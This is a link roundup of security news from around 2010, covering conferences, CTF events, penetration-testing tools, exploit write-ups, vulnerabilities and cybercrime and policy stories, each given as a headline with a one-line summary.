- Belated RSA postings
Some last-minute RSA catchups
- Ninja Networks Twitter – twitter.com
Follow ninjanetworks @ twitter leading up to and during DEFCON for Ninja badge and event information.
- Hackers In Japan – hackerspaces.org
The primary idea is to do a nice trip with hackers from all around the world to Japan.
- A few hacker challenges coming up
- smp Capture The Flag (CTF) 2010 Hacker Olympics – smpctf.com
- The Mid-Atlantic Regional CCDC 2010 Event – Part I – tenablesecurity.com
- The Mid-Atlantic Regional CCDC 2010 Event – Part II – tenablesecurity.com
- Internet Crime Complaint Center Annual Reports – ic3.gov
All the data about hacking incidents and related attacks in one neat report.
- Charlie Miller on Mac OS X, Pwn2Own and Writing Exploits – threatpost.com
An interview with the well-known hacker on his latest projects and future plans.
- Facebook @ OWASP – owasp.org
Part of the wiki in OWASP’s site dedicated to the most popular social network on the planet.
- Black Hat Webcast: Pen Testing the Web with Firefox – scribd.com
The slides from the recent presentation
- The current state of the crimeware threat – Q&A – zdnet.com
One of the guys behind the takedown of the Waledac summarized 33GB of crimeware data.
- Verizon Incident Sharing Framework – taosecurity.blogspot.com
Richard Bejtlich participates on a board affiliated with the VerIS framework.
- Fimap v0.8A – code.google.com/p/fimap/
Fimap is a python tool which can find, prepare, audit, exploit and even search the web automatically for LFI/RFI bugs in webapps.
- Presenting the Meraki WiFi Stumbler… – meraki.com
The first browser-based wireless scanner lets you find networks (even hidden ones) using any system.
- sqlmap 0.8 – bernardodamele.blogspot.com
Damele releases an update to his SQL injection tool.
- ZigBee: attack of the killer bees – h-online.com
Developer Joshua Wright intends to release KillerBee for testing the security of ZigBee networks.
- WhatWeb v0.4 – morningstarsecurity.com
This is the next generation web scanner.
- OWASP JBroFuzz 2.0 Fuzzer Released! – owasp.blogspot.com
An update on the fuzzer from OWASP, featuring better fuzzing, keyboard shortcuts and more.
- Buck Security – buck-security.sourceforge.net
Buck Security is a collection of security checks for Linux.
- skipfish – code.google.com/p/skipfish/
A fully automated, active web application security reconnaissance tool, straight from Google.
- FireCAT v1.6.2 – firecat.fr
The auditing extension catalogue now features BackendInfo in its list.
- Digital Forensics Framework v0.5 – digital-forensic.org
DFF is a simple but powerful open source tool with a flexible module system which will help you in your digital forensics works
- Jericho Forum Offers Free Security Product Assessment Tool – darkreading.com
Jericho Forum has created a free self-assessment tool for security vendors and buyers to determine the security of their products in cloud-based environments.
- XSSploit v0.5 – scrt.ch
It has been developed to help discovery and exploitation of XSS vulnerabilities in penetration testing missions.
- Cookie Monster – tomneaves.com
Cookie Monster will grab cookies from a host and assign each character a number.
- Looking for malware in all the wrong places? – itworld.com
Some thoughts on how malware scanning should evolve in the future
- Effing with Foursquare
Goofing around with the popular location service courtesy of carnalOwnage
- QuickZip Stack BOF : A box of chocolates – part 2 – offensive-security.com
How to build a quickzip exploit using a pop pop ret pointer from an OS dll.
- Blazing fast password recovery with new ATI cards – net-security.org
Get some crazy cracking power by utilizing your GPU.
- Network Analysis, Logitech Mouse Server – digitalbond.com
A bored hacker takes aim at the server program of Logitech’s iPhone app.
- Fresh exploit served up with ads – avg.com
A politically motivated exploit based on Liberty arises.
- Inline vs. Out-of-Line WAF Deployments – tacticalwebappsec.blogspot.com
A response to an article about Web Application Firewall considerations.
- Auto-Scanning the Names People Choose For Their Wireless APs – slashdot.org
One wardriver gathered AP names on his commute for fun and… well, more fun.
- Archiving Windows System Files for Binary Diffing – l1pht.com
I present for your viewing pleasure… binaryeti.
- Technical Report: “Abusing Social Networks for Automated User Profiling” – honeyblog.org
It’s focus is on automatically collecting information about users based on the information available in different networks.
- Top 25 series
SANS Top 25 security flaws comes back for another week.
- Weaponizing dnscat with shellcode and Metasploit – skullsecurity.org
As long as the server has a DNS server set that will perform recursive lookups, it’ll work great!
- Penetrating Intranets through Adobe Flex Applications – gdssecurity.com
In this post, I’ll show how you can exploit Flex applications that use BlazeDS to gain access to internal networks.
- The Latest Adobe Exploit and Session Upgrading – metasploit.com
An exploit against Adobe was ported to Metasploit with interesting results.
- Naming and Shaming ‘Bad’ ISPs – krebsonsecurity.com
The Washington Port security expert analyzes and pinpoints ISPs with outstanding abuse issues.
- Skipfish, Google Enters the Web Scanner Fray – redspin.com
The new scanner from GOOG is tested and reviewed.
- Burp Suite Tutorial – Repeater and Comparer Tools – securityninja.co.uk
A few words on the Repeater and Comparer security tools inside the Burp Suite.
- Sniffing with Wireshark as a Non-Root User – packetlife.net
Use your Linux box with Wireshark.
- Hijacking Blackberry Internet Browsing – remote-exploit.org
You can actually force a BlackBerry to use a rogue access-point for Internet browsing without having special user interaction.
- Exploit’s new technology trick dodges memory protection – h-online.com
JDuck has discovered the first malicious PDF files which use Return Oriented Programming technology to bypass DEP.
- Trouble Ticket Express Exploit in the Wild… – isc.sans.org
A day ago, a proof-of-concept exploit in Trouble Ticket Express help desk software was made public.
- Spamassassin Milter Plugin Remote Root Attack – isc.sans.org
It appears that the bad guys have started to actively exploit SpamAssassin’s milter vulnerability
- Flaw in Virtual PC hits the fan
The vulnerability, which is unpatched, essentially allows an attacker to bypass several major security mitigations.
- Vulnerability in Virtual PC? – windowsteamblog.com
- Microsoft Virtual PC Flaw Lets Hackers Bypass Windows Defenses – threatpost.com
- Holes in Apple’s software to be showcased in CanSecWest
Charlie Miller ran a three-week scan to find app vulnerabilities among several vendors
- Mozilla Acknowledges Critical Zero Day Flaw in Firefox – threatpost.com
It is a critical flaw that could result in remote code execution on a vulnerable version 3.6 of Firefox.
- Stopgap IE Fix, Safari Update Available – krebsonsecurity.com
A couple of browser updates to keep your computer fit and healthy.
- Simple workarounds for latest IE security vulnerability – h-online.com
As posted above, Microsoft has released a workaround to solve your IE security woes
- Airline buys competitor’s cheap seats so you can’t – gadling.com
Some anti-competitive tomfoolery using online ordering and some hacking by a Danish carrier.
- Humans continue to be ‘weak link’ in data security – computerworlduk.com
A UK study shows that data breach costs are rising, too bad we can’t just release a patch to fix “Hu-mans”.
- The Future of Botnets – threatpost.com
Malware-as-a-service is envisioned to take off in a different and scary way.
- Conversations With a Blackhat – ha.ckers.org
An insight to the mind of a person wearing the “other” type of hat.
- Iran hacks US spy sites, arrests 30 activists – computerworlduk.com
Iran’s Islamic Revolutionary Guards Corps hacked into 29 websites affiliated with US espionage networks.
- Reality star turns back on TV to fight cybercrime – sophos.com
Spencer Pratt quitting The Hills to battle the looming national cyberthreat? Or just another reality prank?
- Cyber crime losses in US almost ‘double’ during 2009 – bbc.co.uk
Losses due to online crime totalled $560m in 2009, up from $265m the previous year.
- Internet safety video could win you $10,000 – cnet.com
Trend Micro launched a contest where the person who submits the best short video can win a heap of cold, hard cash.
- Security Pros With Written Career Plans Make More Money – darkreading.com
Around 60 percent of those who have written career plans earn more than $100,000 a year.
- Waledac-based news from the front
- What we know (and learned) from the Waledac takedown – technet.com
- Waledac Botnet Now Completely Crippled, Experts Say – threatpost.com
- Latest Intel processor security features – erratasec.blogspot.com
The updated “Westmere” processors are boosted with new security features.
- New Trick to View Hidden Facebook Photos and Tabs – theharmonyguy.com
A neat trick to peek at hidden stuff from your friends
- Undercover Feds on Social Networking Sites Raise Questions – wired.com
Law enforcement agents are using Facebook and Myspace as investigative tools to root out crooks.
- Academic Paper in China Sets Off Alarms in U.S. – nytimes.com
One Chinese researcher publishes a proof-of-concept attack that could shut down the entire US power grid.
- SQL Injection License Plate Hopes to Foil Euro Traffic Cameras – gizmodo.com
This should teach them to sanitize database inputs.
- Researchers Map Multi-Network Cybercrime Infrastructure – krebsonsecurity.com
The infamous botnet Troyak is analyzed and taken down.
- Change in Focus – securityfocus.com
Symantec buys off a popular security community site, and the future of the site is pondered.
- a $16 pocket spectrum analyzer – ossmann.blogspot.com
Michael Ossmann transforms a teeny bopper messaging device into a spectrum analyzer.
- The tricks in the book – news on the latest cons, scams and dupes on the Web
- Beware census scam artist tricks – cnn.com
- FBI details most difficult Internet scams – networkworld.com
- Top Cybercrimes Of The Year – inc.com
- Law firms are lucrative targets of cyberscams – sfgate.com
- Casinos conned by IT hackers who printed false betting slips – telegraph.co.uk
- We’re Not Talking Peanuts Here, Folks – eset.com
- Stock fixing Russian company investigated
A company allegedly fixing trades in the stock market faces stiff penalties for their misdeeds.
- Top 10 Vulnerability Researchers 2009 – zoller.lu
IBM ISS collected information about the researches that discovered and published most Vulnerabilities in 2009.
- Hacker Disables More Than 100 Cars Remotely – wired.com
A disgruntled ex-employee of an auto center tries to brick cars sold by the company that sacked him.
- PSC sought change – wdam.com
Telemarketers beware, spoofing your caller ID can lead to criminal charges.
- Cybercrime’s bulletproof hosting exposed – theregister.co.uk
Researchers have identified the network framework that endows notorious botnets with always-on connections.
- Revised cybersecurity bill introduced in Senate – computerworld.com
It seeks to improve national cybersecurity preparedness by fostering a closer collaboration between the government and the private sector companies.
- Pwn2Own Predictions: Apple iPhone Will Fall – threatpost.com
Infosec experts predict which devices will get rooted in this year’s CanSecWest hacking contest.
- FTC to Internet Companies: Start Using SSL – eff.org
Outgoing FTC Commissioner Pamela Jones Harbour called on Web services services like Facebook and Hotmail to start using HTTPS/SSL encryption.
- 1st Trial Under California Spam Law Slams Spammer – slashdot.org
People who receive false and deceptive spam emails are entitled to damages of $1,000 per email under California Law
- Fired CISO says his comments never put Penn.’s data at risk – computerworld.com
Maley admits he was wrong to speak at RSA, won’t appeal firing.
- Unprecedented 25-Year Sentence Sought for TJX Hacker – wired.com
Gonzales, who was charged with bank-card theft, might be facing at least 17 years in prison.
- Dismantling of Saudi-CIA Web site illustrates need for clearer cyberwar policies – washingtonpost.com
A website run by the Saudi government jointly with the CIA was shut down to prevent further terrorist threats.
- Malware infected memory cards of 3,000 Vodafone mobiles – itworld.com
The company is now investigating how the malware programs ended up on the phones.
- PNC: Former National City Bank Accounts Hacked – liquidmatrix.org
Due diligence didn’t reveal that a credit card data breach affected PNC’s latest bank acquisition.
- Latest Version Of Cybersecurity Act Lessens Presidential Power – darkreading.com
Chief exec no longer has unilateral power to disconnect networks from the Internet in the event of a major cyberattack.
- End Users Buck Security Advice For Economic Reasons – darkreading.com
Without proof that strong passwords and Website certificates actually keep them safe, it’s no wonder end users ignore security advice, says Microsoft Research expert, others .
- Massive FBI computer overhaul is put on ice (again) – theregister.co.uk
Putting the project known as Sentinel on hold has alarmed some on Capitol Hill.
- IRS security faults leave taxpayer information at risk – networkworld.com
A whopping 69% of the tax agency’s previously noted security flaws remain unfixed.